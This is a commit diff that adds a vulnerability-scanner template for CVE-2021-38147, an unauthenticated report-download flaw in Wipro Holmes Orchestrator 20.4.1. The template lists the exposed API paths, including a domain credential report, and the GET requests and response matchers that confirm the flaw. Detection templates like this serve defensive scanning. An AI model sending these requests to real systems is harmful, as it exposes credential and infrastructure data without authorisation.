add CVE-2021-38147

http/cves/2021/CVE-2021-38147.yaml

@@ -0,0 +1,40 @@
+id: CVE-2021-38147
+
+info:
+  name: Wipro Holmes Orchestrator 20.4.1 Unauthenticated Excel Report Download
+  author: securityforeveryone
+  severity: high
+  description: |
+    Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to download arbitrary files, such as reports containing sensitive information, because authentication is not required for API access to processexecution/DownloadExcelFile/Domain_Credential_Report_Excel, processexecution/DownloadExcelFile/User_Report_Excel, processexecution/DownloadExcelFile/Process_Report_Excel, processexecution/DownloadExcelFile/Infrastructure_Report_Excel, or processexecution/DownloadExcelFile/Resolver_Report_Excel.
+  remediation: Fixed In v21.4.0
+  reference:
+    - https://www.wipro.com/holmes/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-38147
+    - https://packetstormsecurity.com/files/165039/Wipro-Holmes-Orchestrator-20.4.1-Report-Disclosure.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-38147
+    cwe-id: CWE-306
+    epss-score: 0.00497
+    epss-percentile: 0.76242
+    cpe: cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:*
+  metadata:
+    vendor: wipro
+    product: holmes
+  tags: packetstorm,download,exposure,cve,cve2021
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/processexecution/DownloadExcelFile/Domain_Credential_Report_Excel"
+      - "{{BaseURL}}/processexecution/DownloadExcelFile/Process_Report_Excel"
+      - "{{BaseURL}}/processexecution/DownloadExcelFile/Infrastructure_Report_Excel"
+      - "{{BaseURL}}/processexecution/DownloadExcelFile/Resolver_Report_Excel"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(body, '<?xml version=')"
+          - "status_code == 200"
+        condition: and